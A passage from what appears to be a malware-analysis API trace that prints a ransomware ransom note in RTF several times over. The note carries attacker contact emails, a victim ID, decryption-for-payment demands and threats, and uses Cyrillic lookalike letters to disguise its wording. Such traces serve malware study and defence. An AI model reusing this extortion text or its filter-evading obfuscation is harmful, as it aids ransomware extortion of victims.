24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.959] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 